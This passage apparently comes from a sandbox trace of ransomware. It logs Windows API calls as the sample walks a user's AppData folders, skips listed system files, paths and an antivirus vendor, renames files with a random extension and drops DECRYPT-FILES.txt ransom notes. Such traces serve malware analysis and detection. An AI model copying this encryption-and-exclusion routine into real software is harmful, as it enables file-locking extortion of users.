lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.724] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.724] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.724] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.724] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.724] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.724] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.724] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.724] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.724] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.724] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.724] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.724] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.725] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 73 [0078.725] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45") returned 79 [0078.725] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.iKD45" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.ikd45"), dwFlags=0x0) returned 1 [0078.725] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.725] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.726] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.726] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab1bc340, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab1bc340, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab1bc340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.726] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.726] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab149f20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab149f20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab149f20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.726] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.726] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.726] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.726] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.726] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.726] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.726] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned 63 [0078.726] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.726] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\" [0078.727] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\jkbimi8.tmp" [0078.727] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.727] CloseHandle (hObject=0x0) returned 0 [0078.727] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.727] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab149f20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab149f20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab149f20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.727] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.727] CloseHandle (hObject=0x448) returned 1 [0078.727] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0078.728] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0078.728] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0078.728] lstrcatW (in: lpString1="Windows", lpString2="\\" | out: lpString1="Windows\\") returned="Windows\\" [0078.728] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Windows\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\" [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Program Files") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch=":\\Windows") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Games\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\All Users") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="AhnLab") returned 0x0 [0078.728] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.728] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0078.728] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.728] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\jkbimi8.tmp") returned 76 [0078.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.729] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0078.729] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.729] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt") returned 82 [0078.729] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.766] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.767] CloseHandle (hObject=0x44c) returned 1 [0078.767] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\") returned 64 [0078.767] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\*" [0078.767] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab2548c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.768] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.768] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab2548c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.768] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.768] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.768] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c7870d0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2c7870d0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0078.768] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0078.768] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0078.768] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0078.768] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Program Files") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch=":\\Windows") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Games\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\All Users") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="AhnLab") returned 0x0 [0078.768] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.768] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.768] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.768] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\jkbimi8.tmp") returned 84 [0078.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0078.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.769] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.769] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt") returned 90 [0078.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0078.770] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0078.770] CloseHandle (hObject=0x454) returned 1 [0078.771] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.771] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0078.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab2548c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0078.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.771] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xab2548c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.771] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.771] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1c3625f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1c3625f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1c3625f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x53, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adobe[1].txt", cAlternateFileName="5P5NRG~1.TXT")) returned 1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="autorun.inf") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="boot.ini") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="desktop.ini") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="ntuser.dat") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="iconcache.db") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="bootsect.bak") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="ntuser.dat.log") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="thumbs.db") returned -1 [0078.771] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt", lpString2="Bootfont.bin") returned -1 [0078.771] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[1].txt") returned 33 [0078.771] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.771] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.771] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.771] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.771] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.772] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[1].txt") returned 33 [0078.772] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.772] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@adobe[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt") returned="C:\\Users\\5p5NrGJn0jS 